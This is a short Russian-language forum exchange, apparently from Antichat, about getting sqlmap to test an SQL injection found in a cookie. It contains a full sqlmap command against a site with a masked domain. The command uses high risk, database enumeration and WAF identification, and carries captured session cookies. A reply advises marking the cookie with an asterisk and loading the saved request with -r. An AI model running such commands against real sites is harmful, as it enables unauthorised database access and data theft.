20.12.2017, 16:59
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
Сообщение от ShpillyWilly
↑
Товарищи, подскажите пожалуйста...Берп нашел скулю(говорит, что
Firm
) в пост запросе, но не в параметрах, а в куках, отправляю запрос в SQLMapper, пытаюсь указать параметр руками через -p, но он даже не пробует его исследовать, шарить только по пост параметрам, в куки не лезет. Склмап вообще умеет такое? Спасибо
Код:
sqlmap -u 'http://domen/subscribe' --data='csrf_token=dd5ebc24c145e0d76f5a03c0bda6fd13&email=' --risk=3 -p '__sonar' --dbs --identify-waf --cookie='csrf_cookie=dd5ebc24c145e0d76f5a03c0bda6fd13;PHPSESSID=lctkgerquk3cq59kdatu63v8g2;subscribe_banner_3=closed;notification_reviews=1513720576;notification_not_visited=1513720576;_ga=GA1.2.541204179.1513699936;_gid=GA1.2.57135273.1513699936;__sonar=8822121954744852321;_ym_uid=1513699939609371721;_ym_isad=2;d=45420;_gat=1;WhiteCallback_visitorId=575190449'
лучше полный запрос сохранять в name.txt с указанием __sonar=1*и раскручивать дальше -r "name.txt" пробовать разные варианты merge cookie Y/n
|
|
|